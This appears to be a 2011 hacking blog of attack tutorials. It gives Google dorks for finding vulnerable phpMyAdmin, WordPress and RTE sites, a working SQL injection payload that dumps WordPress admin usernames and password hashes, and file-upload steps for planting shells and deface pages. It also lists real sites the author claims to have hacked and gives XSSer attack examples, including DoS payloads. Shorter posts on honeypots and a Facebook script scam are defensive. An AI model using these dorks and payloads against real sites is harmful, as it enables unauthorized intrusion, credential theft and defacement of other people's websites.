Thursday, November 17, 2011

phpmyadmin exploit


phpmyadmin exploit


Dork : allinurl:index.php?db=information_schema


Enter Above Dork in Google it will show more 161,000 results
which will be vulnerable by this Dork


This dork bypasses the admin username and password and Which will be takes directly to information schema tables to get data and You can delete data to ......

Tuesday, November 15, 2011

WordPress Exploit

Exploit Wordpress "/easy-comment-uploads/upload-form.php".

Find Out Sites from this Dork

Dork : "/easy-comment-uploads/upload-form.php"


*|_Exploit_|*

http://[localhost]/[path]/easy-comment-uploads/upload-form.php
http://[localhost]/easy-comment-uploads/upload-form.php

For example

File Extention [.txt],[.jpg],[gif],[bmp]


Preview Your Upload Page
In my case i upload hitcher1.jpg

site/wp-content/uploads/[years]/[month]/[yourshell]
example: site/wp-content/uploads/2011/06/404.php;.txt

For example hacked links

_____________________________________________________
http://www.punjabicomments.co.cc/wp-content/uploads/2011/11/hitcher1.jpg
http://www.deathvalleymag.com/wp-content/uploads/2011/11/hitcher1.jpg
http://www.serpholicmedia.com/wp-content/uploads/2011/11/hitcher1.jpg
http://eleventigers.net/111/wp-content/uploads/2011/11/hitcher1.jpg
http://www.recycledbride.com/blog/wp-content/uploads/2011/11/hitcher1.jpg
http://www.recycledbride.com/blog/wp-content/uploads/2011/11/hitcher1.jpg
http://www.mysodes.tv/wp-content/uploads/2011/11/hitcher1.jpg
http://objekt.com.au/wp-content/uploads/2011/11/hitcher1.jpg
http://h00rj.com/wp-content/uploads/2011/11/hitcher1.jpg
http://www.chetthedog.com/wp-content/uploads/2011/11/hitcher1.jpg
http://maratona.mobi/wp-content/wp-content/uploads/2011/11/hitcher1.jpg
____________________________________________________


Monday, November 14, 2011

WordPress Blog Exploit

First of all use Google Dork to find out such Sites


Dork: inurl:"fbconnect_action=myhome"

[Image: untitled24.JPG]

You will be get such info of admin on page

[Image: untitled22.JPG]

Just change this part of URL :
?fbconnect_action=myhome&userid=

With This part of URL :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z​0mbyak,7,8,9,10,11,12+from+wp_users--

[Image: untitled23.JPG]

Now You will be get Username and Password of Admin

Than Just Encrypt Password In any MD5 Cracker





Friday, November 4, 2011

Rte Remote File Upload Vulnerability

Rte Remote File Upload Vulnerability found in many sites

To find which site's are Vulnerable Use following Google dorks for find such Sites

inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/


These are Exploit

  • siteexample.com/rte/RTE_popup_file_atch.asp

  • siteexample.com/admin/RTE_popup_file_atch.asp

Hack a a site for Example.


Remove /index_new.asp from it and put exploit link with it like

Now you will be get admin control area where you can upload your deface page and also your shell too in some cases like this


Hacked link

Mirror


Saturday, October 22, 2011

Online SQLi Scanners

Online SQLi Scanners

http://scanner.drie88.tk/

http://wolfscps.com/gscanner.php
http://cattuong.net/
http://www.sunmagazin.com/tools/hack/SQLI-Scan/
http://www.be007.gigfa.com/scanner/scanner.php
http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/

Password Breaking Tools 2011 Link Updated

Using this password hacking kit you will be able to crack a lot of passwords like Windows Admin password, pdf passwords, zip files passwords, document passwords, rar passwords and much more
best hacking tools, password crackers, password hacking softwares


Following Password Breaking Tools:
1. PDF Password Remover
2. Windows XP Admin Password Remover
3. Zip File Password Cracker.
4. SQL Password Remover
5. Microsoft Office Password Remover.
6. Microsoft Windows Vista Password Remover.
7. Rar File Password Cracker
8. Windows Password Recovery Kit
9. Password Changer.
10. Distributed File Password Recovery..
and much more
Downloading link click here

Sunday, September 4, 2011

Automatic Tool Pentesting XSS Attacks


Introduction

Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based aplications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

Usage

xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Options:

--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose verbose (default: no)
--gtk launch XSSer GTK Interface

*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:

--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded

*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:

-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target urls
--De=DORK_ENGINE Search engine to use for dorking (bing, altavista,
yahoo, baidu, yandex, youdao, webcrawler, ask, etc.
See dork.py file to check for available engines)

*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.

-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)

*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can select multiple:

--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--retries=RETRIES Retries when the connection timeouts (default 3)

*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:

--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file

*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:

--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem Try -manually- different Character Encoding mutations
(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')

*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can select multiple:

--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)

*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities.
Choose only one option:

--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)

*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code (except with DCP code):

--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code

*Miscellaneous*:

--silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS display -final code- shortered (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered
Examples

If you have interesting examples of usage about XSSer, please send an email to the mailing list.

-------------------
* Simple injection from URL:

$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:

$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

$ python xsser.py -c3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:

$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):

$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.

$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!"
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
(federated XSS pentesting botnet)

$ python xsser.py -d "login.php" --De "duck" --publish

* Examples online:

- http://identi.ca/xsserbot01
- http://twitter.com/xsserbot01
-------------------
* Create a .swf movie with XSS code injected

$ python xsser.py --fla "name_of_file"
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results

$ python xsser.py -u "host.com" --hash
-------------------
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortered link, on positive results founded. XSS real-time exploiting.

$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.

$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly

$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch

ScreenShots:
xsser_core_report

xsser_dcp_sm

xsser_finalcode

xsser_gtk3

xsser_help



Download:http://xsser.sourceforge.net/#download

HONEY POT Trap Hackers

What is HoneyPot??
In layman terms we can say it is a trap set by the administrators for the hackers, to fool them or to make them believe that they are hacking into admins system, but instead of that hackers are getting hacked by the admin.

How does this work??
This works by presenting the hackers a foul scenario where , hacker thinks that he is penetrating into the system but instead, he is going no where except he is playing in the world created by the admins. By doing so, admins are able to check all the malicious activity of the hackers like what all ports hackers are trying to connect, what files they are trying to upload, which all sections they are trying to access.

HonyPot is mainly designed to trap the hackers, or present a virtual system to the hackers which never exists.

Technically, Honeypot tries to listen to all the ports on the system, and whenever hacker tries to port scan the system, it gets a list of open ports which he thinks is open but actually, it is the opened port which is shown by the honeypot behind the firewall, so when ever hacker tries to access some random port say 100, then he is accessing the honeypot not the system,

Above scenario can be visualised better: Install a VM ware on a system and run any low version of windows or linux on it with all ports open, and port forward those ports on the host system, so when ever hacker tries to fingerprint or try to do port scan, then he will be gettng info about the VM ware not the host system, hacker may be able to penetrate into the VM ware OS, but our HOST OS remains safe.

But there are mainly deficulty in doing the above job , so special application is created called HONEYPOT to do this job and many other jobs like tracking of packets, file access etc.

There are mainly 3 types of honeypots available:
1.Small: Mainly keeps the log of ip-address which are trying to access your system alongwith the port
2.Medium: Its functionality is little advanced, keeping track of files accessed, time-period, hosts etc.
3.Large: It provides all the functionality, but the main feature of these kind of Honeypots are security feature, these can simulate virtual os for the outsiders or hackers very well.

In this article I am going to give the example of HoneyPot of small scale for Windows.
HoneyPots are available both on commercial platform and also as open source, I am taking the example of KFsensor which is freely available here.
STEP 1: Download the KFSENSOR and winpcap from their website and install them
STEP 2: Restart your system, start winpcap server from the folder menu where it is saved mainly in c:\ drive
STEP 3: Start KFsensor, do as promted in the window , it is mainly for the configuring of your new HONEYPOT.
STEP4: Done, keep your system up for the packets scanning.

untitled

Here in above picture u can see some port numbers are striked out, because you need to restart the system, then start your honeypot, then internet connection, else these ports will be used by net connection first, then this honeypot willnot be able to access these ports, hence no information gathering will be possible.

We can also create our small honeypot whose main function is to check for the incoming packets.......
It is nothing but the basic client-server program which listens on all port.

untitled%2B%25281%2529


Within minutes of intallation of this small honeypot i got the scanning alert sound, when checked these were the UDP packets mainly left over the internet for scanning of hosts........

Sunday, August 28, 2011

Hack Website Through Exploit of Xpoll Admin

Frist of all open

Http:// Google.com

Then type xpoll admin
in a seacrh bar

After hit you will be see many sites which are search by google
now open sites you will be get open admin image upload area where you can upload your
Deface page / shell / or you can load your image to

Once you upload your Deface page
than remove /admin from URL and after images/ type your deface page name like hitcher101.html in my case

Demo

Enjoy it



Saturday, August 20, 2011

Save your Facebook account from Malicious script scam

First of all What is a malicious script scam >?

In a malicious script scam you are asked to copy and paste text into your browser’s address bar in order to see something interesting or surprising for example who viewed your profile


This "code" is actually a malicious script. Instead of showing you what was advertised, it uses your account to create events and pages and send your friends spam.

Stay Safe

Spammers often advertise surprising things like (ex: the opportunity to see who viewed your profile) to try to lure people into their spam traps.
  • Never click on suspicious links, even if they’re sent by your friends.
  • Never copy and paste text into your internet browser address bar if you are unsure of what it is.